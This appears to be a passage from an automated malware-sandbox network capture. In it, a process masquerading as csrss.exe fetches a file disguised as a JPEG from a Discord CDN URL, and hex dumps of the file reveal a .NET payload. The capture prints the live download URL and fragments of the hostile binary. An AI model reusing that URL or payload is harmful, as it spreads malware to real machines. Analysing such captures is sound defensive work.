                                                  2022-04-23 06:14:45 UTC609INData Raw: d5 6a 00 85 a3 21 41 74 94 74 7f 21 4d c8 94 b5 ba 79 27 4f 42 08 79 7b 7d 79 3b 42 4f ef 08 2f be c5 57 0e 58 75 5f 6b 38 20 b6 7f b8 3a 25 76 75 d4 9f 3c 65 9b 08 1b db 2e 90 c1 b3 ec 58 eb d5 f4 55 81 45 66 8e 29 fd d4 85 d7 62 f7 65 2c 2a 97 77 e5 8b 3e 08 2f ce 3f fa cb c7 53 14 2e 98 d1 0b 8e 4c d5 fc 03 37 f5 51 f2 97 99 82 89 4f 16 3c ca eb c2 1a 9e ec 0d 4e 2f 08 eb 6b 79 8d 9e eb 9e e6 7b ae 86 4d 7c d3 4b f9 96 f4 63 9f 2b 75 6c 64 18 3d 90 68 05 4f f2 4d 52 da d3 f9 3d 7d 2e 90 e5 7c 95 d7 04 a0 fa 3b 5f 7a 91 26 90 d5 2b 1d db 1b d9 e0 fc 08 c0 9a f7 23 4a 56 46 4f 01 68 56 bd 9b 68 39 2c e3 80 1f 87 84 0e 87 40 af 01 7c eb 0f ec d4 11 f6 6b 45 04 5d 71 c6 7a f3 24 45 5e af 13 78 4a 04 01 77 be c4 bb 65 ed 1f 9f 37 cc ee c4 d1 7a 6c 96 6e f0
                                                  Data Ascii: j!Att!My'OBy{}y;BO/WXu_k8 :%vu<e.XUEf)be,*w>/?S.L7QO<N/ky{M|Kc+uld=hOMR=}.|;_z&+#JVFOhVh9,@|kE]qz$E^xJwe7zln
                                                  2022-04-23 06:14:45 UTC625INData Raw: 75 88 6b 16 8a 47 68 df 0e 82 a1 2d 2b 40 4a 40 63 fd 70 9b da a9 b9 da b8 53 d5 6c 06 c7 8f a2 71 93 fe 15 07 5e 57 95 ae 7e 06 5f 59 08 26 b3 ee 05 88 37 71 f9 a2 fb d2 f2 a9 fe 2b c2 17 6e 41 42 eb bd 92 e8 b2 30 7e 90 07 54 37 21 14 ae fe 72 d5 fc a9 c5 bb 2d d7 2e 0a ac 2d b8 47 2a b5 5a 52 af 7e d3 7f cd 9b c6 0a e1 69 be 71 f8 3b be 56 68 55 52 c9 5b 0d a4 99 b0 09 72 99 21 bb 3a e4 40 01 e9 a3 96 f2 20 6f 64 d9 97 f4 1a 83 6d 5f db ad ee 8d 2f 58 66 0e 77 27 ae 54 7d a2 f8 13 6f a3 95 65 f4 2f 80 36 2a cd 69 ef ac b4 2a db 62 87 10 7e fc 33 eb 27 65 d6 2a 62 d7 f3 9d 62 b7 af 36 fb 68 6b 70 68 73 3e 3d fd cd 85 ca 67 4a 6e af af c3 ad 23 05 bd 80 23 8c 39 2f f2 71 c6 23 25 c4 ec 0c 1d 7e b2 01 0c 1e f5 75 17 b8 db 96 4f f3 f0 8f 80 c9 41 49 b5 70
                                                  Data Ascii: ukGh-+@J@cpSlq^W~_Y&7q+nAB0~T7!r-.-G*ZR~iq;VhUR[r!:@ odm_/Xfw'T}oe/6*i*b~3'e*bb6hkphs>=gJn##9/q#%~uOAIp
                                                  2022-04-23 06:14:45 UTC636INData Raw: ba 40 fe de 45 9a b1 76 37 ab ba 05 ad 99 a5 06 c3 e2 93 73 46 60 66 6c e9 c4 4f 9d 14 b1 aa d4 42 eb 33 a0 f8 48 db 08 11 08 69 24 c3 aa bf 3b 0f 2e 94 44 c1 ba 4f 14 a8 d4 42 6b 48 c8 9d 8f 9c ee 14 11 d4 92 89 5e 4f 0e b4 bf 62 f6 c8 f7 22 e8 89 b0 7b 76 1c eb 9c 41 7e 63 61 eb 9d 21 69 8d 8c 28 36 ae 49 e9 f5 18 86 24 3d e9 e1 60 59 d6 71 d4 33 5b 77 e7 c6 8f 01 54 97 79 7c 52 70 16 88 c2 ac cd b6 6e 44 2a 3c 3f ea a0 13 11 0c 1c dc 82 67 7a 91 99 5e 40 ad e4 c1 ab f7 be 19 fc 76 f8 4c d0 22 60 2e ba d3 3f f7 e3 26 13 e5 12 f1 4b c6 91 cd a4 33 e1 1f d3 c1 93 fa 11 0e a4 8a 9b 77 12 1a 55 e1 23 20 f4 15 f1 81 2f b9 32 7e 76 75 f1 be 53 60 fa 4a 53 56 b5 9c 7f 1b 80 4b 02 39 49 1f 27 02 22 41 31 50 1b f2 e2 57 81 0f ac e9 aa bb b9 19 4e 9d 17 c1 11 15
                                                  Data Ascii: @Ev7sF`flOB3Hi$;.DOBkH^Ob"{vA~ca!i(6I$=`Yq3[wTy|RpnD*<?gz^@vL"`.?&K3wU# /2~vuS`JSVK9I'"A1PWN
                                                  2022-04-23 06:14:45 UTC652INData Raw: 1d 03 c3 4a 08 b6 cd 92 f5 9f a9 ed 05 5a 0b e0 52 e4 a5 1f 83 5d 7d 39 e5 15 51 b2 8a 45 11 4f 1f d0 f1 d4 d1 8c 85 57 b3 b9 41 90 37 11 b7 da ee ed c5 8c ab bb 10 b1 80 c6 0c 84 58 fe 4b 8b 44 6a 5b 37 3e 5d 44 4a 31 e7 67 2e a3 dc ae f0 99 cd 22 bd e7 32 ff 87 09 9c b0 65 c3 60 05 7a 07 d1 9a 9c de 30 d9 a2 8d d4 47 c9 73 03 14 39 23 b8 70 e5 12 15 f7 25 33 29 b5 34 0e f1 de e8 0d 98 01 19 e8 89 3f 71 47 42 6d 05 be 38 bd 2a 85 2b 1d fd 3d 7c 09 85 58 b9 7f bf 2c 99 7a 88 23 42 9c fa a8 86 95 03 9d cf 00 63 48 a7 f5 2a 70 fd cc c2 51 e0 5b c5 2a de 5e f6 2a 4b 05 5b a4 82 f5 3c 3e ad f7 be 41 31 dc 66 82 81 88 09 5e f9 41 07 15 53 14 b6 f7 78 8d 8b 99 14 6f 35 a9 04 33 f4 7b f6 07 87 24 43 35 8b cf e1 84 b8 c1 64 d4 6e 72 73 70 cc 1e 71 c4 dc 76 75 89
                                                  Data Ascii: JZR]}9QEOWA7XKDj[7>]DJ1g."2e`z0Gs9#p%3)4?qGBm8*+=|X,z#BcH*pQ[*^*K[<>A1f^ASxo53{$C5dnrspqvu
                                                  2022-04-23 06:14:45 UTC668INData Raw: a9 58 90 c4 8c 1d a7 9b 87 a1 f7 df 78 aa 69 ec 6d 05 83 a5 49 91 af 1b b7 73 78 e6 6d 81 70 f9 fe 8d d9 bc a2 b3 98 01 63 5e c2 30 03 e4 f6 c7 ed e0 58 97 b8 a4 b2 1b e0 5f d3 4a 10 f5 52 ae 6a 9f 4d 8f 50 c4 c1 f6 63 03 5d c8 43 9d 4e 97 1b 42 12 6e 0f ad 81 a8 b9 36 ab e0 3a 9a 11 26 82 08 dc 9b 2e 31 87 a7 5e c1 7b d6 a3 f3 62 ec 76 59 56 f2 e7 38 84 bf 66 bb e2 03 aa 1f 84 46 d4 20 94 6f 31 da d7 6b d6 35 0b 16 14 50 6b a5 a8 14 f3 57 f8 0e b5 76 db c2 8e b2 96 d7 4d d9 7a d7 10 f6 e3 b6 55 aa 8a 69 c4 c1 fc 51 4d 04 b4 a3 88 06 01 96 d7 d7 9b c9 64 b9 86 0c 5a 94 8f e0 16 90 64 b8 47 70 14 ab de a9 18 6f d7 00 3c 87 9c 14 ad 10 1c c4 dc 15 72 e1 e1 95 84 20 ff 26 f9 62 fc b6 a7 15 1c 86 a8 8b 83 c5 84 14 48 28 66 6c 2f b7 55 87 a3 88 7e 3b 5a 3e 84
                                                  Data Ascii: XximIsxmpc^0X_JRjMPc]CNBn6:&.1^{bvYV8fF o1k5PkWvMzUiQMdZdGpo<r &bH(fl/U~;Z>
                                                  2022-04-23 06:14:45 UTC684INData Raw: 12 82 af ef 37 1b b1 ed 58 27 00 47 f6 72 6b 97 0a 59 aa 43 9c 43 80 78 57 27 e6 ef 1c f4 50 06 6f 84 c3 ad 8c 5f 06 98 50 06 ec 94 49 bf 03 3c 28 71 ef a7 61 b8 92 e2 4f 7b 75 26 ed d3 43 63 9f 03 95 7f a3 14 2a 77 10 7f bb 68 75 d0 2c 46 61 9f 60 97 5d 86 75 64 f7 ab 60 43 df 56 cb 0c cf 36 fe 7f 65 d9 9c f1 ea 1c b5 b4 c1 f4 b8 0b 58 be 86 f1 b1 a6 c7 77 c1 f2 05 64 b9 ae 7a 2f 51 72 56 29 eb 2b 79 ec d2 c2 da 09 35 e9 91 e5 3f 5e fb 0f ae 4d 02 7e 99 4f 43 a1 a2 69 72 55 18 29 15 1a 67 8f 0f b5 22 cb 03 c5 72 79 2a 43 9b 25 39 f6 67 b1 ae 9d 7c 46 3f 7f f3 7d f5 11 e9 84 44 b2 f1 2a c6 43 c1 b1 74 1b 38 4e ca 4d ad 58 f4 ab 4a 78 28 f0 c9 dd e1 41 00 21 8f 52 a9 c6 d8 6c 33 0a 56 ca 06 6b 21 a2 54 d8 fb e1 bb 99 e0 db da 5f fa ce f7 e8 b2 9c 48 74 52
                                                  Data Ascii: 7X'GrkYCCxW'Po_PI<(qaO{u&Cc*whu,Fa`]ud`CV6eXwdz/QrV)+y5?^M~OCirU)g"ry*C%9g|F?}D*Ct8NMXJx(A!Rl3Vk!T_HtR
                                                  2022-04-23 06:14:45 UTC700INData Raw: 00 7f 0a d4 67 60 4b 30 bb c3 69 18 3d 51 c6 bf a2 fc 13 2b 28 26 43 e8 b4 67 86 b3 4c 84 6b 18 c0 15 59 62 15 1c 10 38 f6 79 8f ef f9 8e d3 17 fd 44 ff 55 17 05 f4 f5 be 52 9d fe 3f 12 85 dc 2f 6d 5c 5e 95 66 cb 11 1a 8b 7f 04 2b 6f a1 e3 3b e7 41 b9 e5 84 f3 b2 84 54 13 87 05 26 4d 75 8b e5 80 05 08 c3 c7 ac 0b a9 3c 32 77 3d 85 72 89 b5 e0 38 f5 2a 2c 01 2c 57 4f 20 4c 95 5c e7 d1 3b 4f e0 7e 60 68 ee 82 c8 8a 69 98 29 40 82 f8 0e 24 fe 12 fa c9 87 e9 a8 d6 55 88 c6 c1 83 61 b4 2f 0f 9c 4a b9 31 c6 b0 b2 12 72 3a 6e 3c 2b c9 9e dc 0b ae 26 71 fe 68 0b 00 b0 66 75 95 ea 70 0c 03 f3 31 25 c3 3d 72 bf dc 6d 5d 26 f3 c4 fb bf de 3b 39 2b c4 66 7e 19 77 d3 39 02 8c 3a e3 84 58 7c 42 bf 41 fc 0a 1c c0 ed a2 8b 81 09 6d bf 55 3d 34 83 ac a4 c2 cb f6 8c de e2
                                                  Data Ascii: g`K0i=Q+(&CgLkYb8yDUR?/m\^f+o;AT&Mu<2w=r8*,,WO L\;O~`hi)@$Ua/J1r:n<+&qhfup1%=rm]&;9+f~w9:X|BAmU=4
                                                  2022-04-23 06:14:45 UTC716INData Raw: 15 0c ee 87 05 cd 58 38 db 82 9e 0d f0 1e 11 a3 17 27 b1 13 11 4c 1e 52 8e cc 30 72 da 05 dd 5b 22 53 63 04 9e 86 cd d9 ed af 44 ad 86 52 74 7b 78 8d 5c 0e c7 a8 5c 50 05 9e 30 7c 7d 74 73 84 47 e9 b4 fb 26 59 c3 1a 34 9c ef 2b 16 89 5a d5 cb b6 2c d7 d1 19 8a b3 a6 63 f2 37 8d e3 60 5b e6 24 f4 e0 e8 80 5b 3e fa 4f 02 03 40 49 19 97 e4 b8 81 ea 8c 53 5e 95 4e 47 5d db 6e fe 78 fa 5c 2d e9 3f 06 42 03 da c8 25 7e 90 cf 2a 58 3f 44 2a bc 36 38 e3 73 fc e2 8e 0b 03 0c bb cd fb 63 6a ef 22 85 10 df b8 01 8b 2d d0 cc a0 3b a4 ea d2 42 c1 b7 6a db be 47 b1 62 7a 22 86 35 1a 6d 8c 55 59 4b b6 84 b5 9e bb a6 bd d9 1b 94 3e fd a5 b8 3c 1d bf 9a d7 78 96 95 ab a2 d3 65 7b 00 59 41 0c 9e 40 6a 0c b1 07 b0 1e 16 15 cf ab 5c a4 97 bf 24 0d 94 ae a0 29 56 b1 cc 29 be
                                                  Data Ascii: X8'LR0r["ScDRt{x\\P0|}tsG&Y4+Z,c7`[$[>O@IS^NG]nx\-?B%~*X?D*68scj"-;BjGbz"5mUYK><xe{YA@j\$)V)
                                                  2022-04-23 06:14:45 UTC732INData Raw: e3 44 a0 17 5c fd 12 84 b9 6a 92 0d 5d b3 50 8d 87 3c df 19 5c fb 5d 9d 33 92 76 ed db 38 91 09 5e eb 07 8e 8c 7c cb 45 34 a8 39 41 f4 19 44 49 e1 85 dc fc f2 e6 a7 22 53 f3 17 03 b7 17 f3 67 23 83 67 f3 f3 53 b7 23 53 f3 17 83 b7 17 f3 67 23 83 67 f3 f3 53 b7 23 a7 07 e3 77 43 e3 07 d3 d7 77 93 07 07 a7 43 6f a7 07 1c 88 43 e3 07 97 d7 77 93 04 07 37 19 9a 00 05 08 00 00 04 c2 5d d0 ff 08 45 8b e5 89 55 00 1f 8b 08 00 00 00 00 00 04 00 e3 f2 17 62 f3 2c 29 4e cd 49 93 62 d0 12 f2 2a a8 28 2a c8 c8 c9 29 cb 49 4d 4f 4f 4e a9 2a 4f 35 62 92 62 b0 92 14 12 e7 60 14 60 92 90 52 e2 2f 2c 4f 2d 2b cc 4a cd 2c 2c cb d2 4b ad 48 ed 60 64 5c c5 c8 13 9c 55 51 5a 90 9c 5a 02 12 01 00 f9 6f d0 ad 51 00 00 00 00 00 00 00 08 c2 ec 89 48 5d d1 ff e5 89 48 55 00 00 2a
                                                  Data Ascii: D\j]P<\]3v8^|E49ADI"Sg#gS#Sg#gS#wCwCoCw7]EUb,)NIb*(*)IMOON*O5bb``R/,O-+J,,KH`d\UQZZoQH]HU*
                                                  2022-04-23 06:14:45 UTC748INData Raw: 28 1a 14 07 0e 2d 08 00 de 26 03 de 26 06 00 00 65 28 1a 14 02 0e 2d 06 22 2c 03 00 de 26 03 de 0a 17 0a 00 00 ad 28 07 0c 16 0b 0a 00 00 ac 28 02 00 de 26 f4 2b 0a f2 2b 0a 00 00 ab 28 0d de 26 0a 2c 16 17 26 08 2d 1a 02 00 2b 0a 03 2b 26 03 2d 19 16 11 00 00 23 00 00 00 5f 00 04 30 1b 00 00 00 00 08 00 db 3e 00 9d 00 02 01 00 00 5e 06 00 d0 14 00 bc 00 00 01 00 00 5e 38 00 3a 09 00 31 00 00 00 00 28 01 00 00 00 2a 08 dc 06 00 00 76 28 03 12 00 00 00 08 dd 00 00 00 0d dd 26 13 de 26 06 00 00 65 28 1a 14 07 26 06 00 00 65 28 1a 14 08 1a 2c 03 0a 00 00 aa 28 04 08 00 02 0b fe 06 00 00 6d 28 02 0a 2d 04 31 2d 0a 00 00 67 28 08 06 00 00 75 28 03 12 06 00 00 73 28 0a 00 00 65 28 06 00 00 bb 28 65 95 d9 be 20 08 03 12 0c 0a 00 00 66 28 06 00 00 72 6f 02 07 00
                                                  Data Ascii: (-&&e(-",&((&++(&,&-++&-#_0>^^8:1(*v(&&e(&e(,(m(-1-g(u(s(e((e f(ro


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.649723162.159.133.233443C:\Recovery\csrss.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-04-23 06:14:59 UTC758OUTGET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  2022-04-23 06:14:59 UTC759INHTTP/1.1 200 OK
                                                  Date: Sat, 23 Apr 2022 06:14:59 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 387072
                                                  Connection: close
                                                  CF-Ray: 7004764d3c395bf1-FRA
                                                  Accept-Ranges: bytes
                                                  Age: 468
                                                  Cache-Control: public, max-age=31536000
                                                  ETag: "fce090eab4bfe6a3d63ebc34f3979aaf"
                                                  Expires: Sun, 23 Apr 2023 06:14:59 GMT
                                                  Last-Modified: Fri, 11 Feb 2022 19:48:42 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: HIT
                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Cf-Bgj: h2pri
                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                  x-goog-generation: 1644608922184980
                                                  x-goog-hash: crc32c=wezq3g==
                                                  x-goog-hash: md5=/OCQ6rS/5qPWPrw085earw==
                                                  x-goog-metageneration: 1
                                                  x-goog-storage-class: STANDARD
                                                  x-goog-stored-content-encoding: identity
                                                  x-goog-stored-content-length: 387072
                                                  X-GUploader-UploadID: ADPycdtKqfssV5gXSEkEU-GSIerpxp8CHIbDYFk25SOnHq78HplyaMuQo1jVekgXmuj72goZFfCtCGw0Rr6hHXhhv5O64hS4RUso
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EiEcMYOm7LcvdKPc7LOv71vUuhRKWeD6KAaUHpLbf6H9dsBKJDoAkEBeskfrbF964TaaGBy4SEbeVgr%2BrpM8G8CFzCxE1NA2nqFmIQ9IH0WJS378jqtApc6J7XDMmpQ0MlCPcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  2022-04-23 06:14:59 UTC760INData Raw: 00 00 00 00 00 00
                                                  Data Ascii:
                                                  2022-04-23 06:14:59 UTC760INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  2022-04-23 06:14:59 UTC761INData Raw: 04 00 00 00 00 00 00 00 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 02 e4 00 00 00 00 00 00 00 00 00 00 02 e4 00 06 00 58 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: ?OFNI_NOISREV_SV4XH0
                                                  2022-04-23 06:14:59 UTC763INData Raw: 07 05 ed 81 11 35 12 01 02 00 08 05 1d 02 05 1d 02 18 08 06 07 0a 18 05 1d 02 07 05 0e 0e 02 07 04 a9 80 12 00 20 05 18 00 20 03 a1 80 12 00 00 05 02 02 02 02 e9 80 12 a5 80 12 75 12 02 08 07 0f 7d 12 0e 05 1d 02 20 07 0e 1d 0e 01 00 05 89 80 11 00 20 05 89 80 11 00 00 05 69 81 11 01 01 00 06 89 80 11 02 7d 12 71 81 12 02 05 07 0c 9c 80 12 01 07 05 08 08 0e 02 20 05 03 08 01 20 04 0e 0e 08 0e 08 0e 94 80 12 07 07 0b 1c 0e 0e 02 00 05 0d 00 20 03 49 82 11 00 20 05 bd 80 12 00 00 05 49 82 11 08 08 bd 80 12 04 07 0a 21 81 11 08 25 81 11 11 81 11 1d 81 11 0e 01 06 20 11 08 08 05 1d 0e 03 20 07 0e 01 01 00 04 02 0e 02 03 07 05 05 1d 0e 01 02 00 06 d5 80 11 0e 01 00 06 0e 01 81 12 01 00 06 98 80 11 0e 0e 0e 04 07 08 05 1d 08 39 81 12 03 07 08 05 01 07 03 08 08
                                                  Data Ascii: 5 u} i}q I I!% 9
                                                  2022-04-23 06:14:59 UTC764INData Raw: 6c 69 75 42 65 63 72 75 6f 73 65 52 64 65 70 79 54 79 6c 67 6e 6f 72 74 53 2e 73 6c 6f 6f 54 2e 73 65 63 72 75 6f 73 65 52 2e 6d 65 74 73 79 53 33 00 01 41 00 00 00 00 00 15 00 01 08 00 00 00 00 00 14 00 01 08 00 00 00 00 00 13 00 01 08 0e 1d 00 28 04 00 00 00 00 00 12 00 01 08 00 00 00 00 00 11 00 01 08 24 11 00 28 04 00 00 00 00 00 10 00 01 08 00 00 00 00 00 0f 00 01 08 00 00 00 00 00 0e 00 01 08 b8 80 12 00 28 05 00 00 00 00 00 0d 00 01 08 00 00 00 00 00 0c 00 01 08 00 00 00 00 00 0b 00 01 08 00 00 00 00 00 0a 00 01 08 00 00 00 00 00 09 00 01 08 00 00 00 00 00 08 00 01 08 00 00 00 00 00 07 00 01 08 0c 81 12 00 28 05 00 00 00 00 00 06 00 01 08 60 12 00 28 04 08 00 28 03 ac 80 11 00 28 05 4c 11 00 28 04 d5 81 11 01 01 20 06 00 00 00 00 00 05 00 01 08 00
                                                  Data Ascii: liuBecruoseRdepyTylgnortS.slooT.secruoseR.metsyS3A($(((`(((L(
                                                  2022-04-23 06:14:59 UTC765INData Raw: 39 12 18 e5 80 12 03 20 09 18 18 01 20 04 02 10 18 02 02 00 06 02 0e 0e 02 03 00 06 09 10 09 19 18 02 04 00 08 0e 10 18 18 02 00 06 22 01 0e 10 18 01 00 05 09 10 09 18 18 02 04 00 08 08 2d 82 12 18 18 09 04 00 09 18 02 01 00 04 02 01 18 02 78 11 18 03 00 07 08 01 08 2a 02 09 10 09 18 1d 02 03 00 08 2d 82 12 18 09 18 18 04 00 09 08 2d 82 12 18 08 03 00 08 c5 80 11 10 08 0a 02 00 08 08 70 12 08 02 03 00 07 08 10 08 08 02 00 06 08 2d 82 12 08 01 03 00 08 08 08 08 18 18 04 00 07 08 08 2d 82 12 08 08 08 05 00 0a 08 00 00 03 6c 11 08 01 00 05 68 12 06 03 05 1d 01 01 20 05 05 1d 00 20 04 0e 00 20 03 02 01 01 20 04 05 1d 06 03 e5 80 12 02 01 20 06 1c 39 12 08 e5 80 12 03 20 09 08 02 01 20 04 18 1c 01 02 20 05 08 08 02 02 20 05 5c 12 25 82 12 25 82 12 25 82 12 08
                                                  Data Ascii: 9 "-x*--p--lh 9 \%%%
                                                  2022-04-23 06:14:59 UTC767INData Raw: 74 65 67 00 65 6d 61 4e 72 65 73 55 5f 74 65 67 00 6c 6f 63 6f 74 6f 72 50 79 74 69 72 75 63 65 53 5f 74 65 73 00 66 4f 78 65 64 6e 49 00 6e 69 4d 00 74 61 6d 72 6f 46 00 73 64 6e 6f 63 65 53 6c 61 74 6f 54 5f 74 65 67 00 64 65 73 70 61 6c 45 5f 74 65 67 00 77 65 4e 74 72 61 74 53 00 65 6d 61 4e 79 72 6f 74 63 65 72 69 44 74 65 47 00 65 74 65 6c 65 44 00 73 65 74 79 42 6c 6c 41 65 74 69 72 57 00 68 74 61 50 72 65 64 6c 6f 46 74 65 47 00 79 72 6f 74 63 65 72 69 44 65 74 61 65 72 43 00 68 74 61 50 70 6d 65 54 74 65 47 00 64 6e 65 70 70 41 00 67 6e 69 72 74 73 62 75 53 00 68 74 69 57 73 74 72 61 74 53 00 6d 69 72 54 00 6d 6f 72 46 64 61 6f 4c 00 67 6e 69 72 74 53 34 36 65 73 61 42 6f 54 00 74 6e 61 69 72 61 76 6e 49 72 65 70 70 55 6f 54 00 65 70 79 54 67 6e
                                                  Data Ascii: tegemaNresU_teglocotorPytiruceS_tesfOxednIniMtamroFsdnoceSlatoT_tegdespalE_tegweNtratSemaNyrotceriDteGeteleDsetyBllAetirWhtaPredloFteGyrotceriDetaerChtaPpmeTteGdneppAgnirtsbuShtiWstratSmirTmorFdaoLgnirtS46esaBoTtnairavnIreppUoTepyTgn
                                                  2022-04-23 06:14:59 UTC768INData Raw: 00 73 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 6d 75 6e 45 00 78 45 65 6d 61 4e 65 6c 69 46 65 6c 75 64 6f 4d 74 65 47 00 65 6c 64 6e 61 48 65 73 6f 6c 43 00 73 73 65 63 6f 72 50 6e 65 70 4f 00 73 65 73 73 65 63 6f 72 50 6d 75 6e 45 00 65 67 61 73 73 65 4d 64 6e 65 53 00 74 78 65 54 77 6f 64 6e 69 57 74 65 47 00 74 63 65 52 77 6f 64 6e 69 57 74 65 47 00 73 77 6f 64 6e 69 57 64 6c 69 68 43 6d 75 6e 45 00 64 49 73 73 65 63 6f 72 50 64 61 65 72 68 54 77 6f 64 6e 69 57 74 65 47 00 65 6d 61 4e 73 73 61 6c 43 74 65 47 00 63 6f 6c 6c 41 6c 61 75 74 72 69 56 00 6f 66 6e 49 6f 65 47 74 65 47 00 44 49 43 4c 74 6c 75 61 66 65 44 72 65 73 55 74 65 47 00 44 49 6f 65 47 72 65 73 55 74 65 47 00 61 00 6c 6f 64 71 67 6b 4d 00 02 80 80 e2 88 80 e2 8b 80 e2 8b 80 e2 06 00 72
                                                  Data Ascii: seludoMssecorPmunExEemaNeliFeludoMteGeldnaHesolCssecorPnepOsessecorPmunEegasseMdneStxeTwodniWteGtceRwodniWteGswodniWdlihCmunEdIssecorPdaerhTwodniWteGemaNssalCteGcollAlautriVofnIoeGteGDICLtluafeDresUteGDIoeGresUteGalodqgkMr
                                                  2022-04-23 06:14:59 UTC769INData Raw: 65 74 73 79 53 00 65 74 75 62 69 72 74 74 41 6b 72 6f 77 65 6d 61 72 46 74 65 67 72 61 54 00 65 74 75 62 69 72 74 74 41 72 65 74 6e 69 6f 50 6e 6f 69 74 63 6e 75 46 64 65 67 61 6e 61 6d 6e 55 00 74 6e 65 6d 6e 6f 72 69 76 6e 45 65 6d 69 74 6e 75 52 00 6c 61 68 73 72 61 4d 00 65 74 75 62 69 72 74 74 41 65 6c 62 69 73 69 56 6d 6f 43 00 73 65 63 69 76 72 65 53 70 6f 72 65 74 6e 49 2e 65 6d 69 74 6e 75 52 2e 6d 65 74 73 79 53 00 6e 6f 69 74 6e 65 76 6e 6f 43 67 6e 69 6c 6c 61 43 00 73 72 65 70 6c 65 48 65 6d 69 74 6e 75 52 00 65 74 75 62 69 72 74 74 41 79 74 69 6c 69 62 69 74 61 70 6d 6f 43 65 6d 69 74 6e 75 52 00 65 6c 69 74 61 6c 6f 56 73 49 00 73 65 63 69 76 72 65 53 72 65 6c 69 70 6d 6f 43 2e 65 6d 69 74 6e 75 52 2e 6d 65 74 73 79 53 00 65 74 75 62 69 72
                                                  Data Ascii: etsySetubirttAkrowemarFtegraTetubirttAretnioPnoitcnuFdeganamnUtnemnorivnEemitnuRlahsraMetubirttAelbisiVmoCsecivreSporetnI.emitnuR.metsySnoitnevnoCgnillaCsrepleHemitnuRetubirttAytilibitapmoCemitnuRelitaloVsIsecivreSrelipmoC.emitnuR.metsySetubir
                                                  2022-04-23 06:14:59 UTC771INData Raw: 72 50 00 6e 6f 69 74 63 65 6c 6c 6f 43 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 00 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 00 73 73 65 63 6f 72 50 00 65 74 75 62 69 72 74 74 41 65 64 6f 43 72 65 73 55 6e 6f 4e 72 65 67 67 75 62 65 44 00 65 74 75 62 69 72 74 74 41 6e 65 64 64 69 48 72 65 67 67 75 62 65 44 00 65 74 61 74 53 65 6c 62 61 73 77 6f 72 42 72 65 67 67 75 62 65 44 00 73 63 69 74 73 6f 6e 67 61 69 44 2e 6d 65 74 73 79 53 00 65 74 75 62 69 72 74 74 41 65 6c 62 61 73 77 6f 72 42 72 65 67 67 75 62 65 44 00 65 74 61 67 65 6c 65 44 00 65 6d 69 54 65 74 61 44 00 74 72 65 76 6e 6f 43 00 6c 65 64 6f 4d 74 6e 65 6e 6f 70 6d 6f 43 2e 6d 65 74 73 79 53 00 6e 6f 69 74 70 65 63 78 45 32 33 6e 69 57 00 64 65 7a 69 6c 61 69 63 65 70 53 2e 73 6e 6f 69 74 63 65 6c 6c
                                                  Data Ascii: rPnoitcelloCeludoMssecorPeludoMssecorPssecorPetubirttAedoCresUnoNreggubeDetubirttAneddiHreggubeDetatSelbasworBreggubeDscitsongaiD.metsySetubirttAelbasworBreggubeDetageleDemiTetaDtrevnoCledoMtnenopmoC.metsySnoitpecxE23niWdezilaicepS.snoitcell
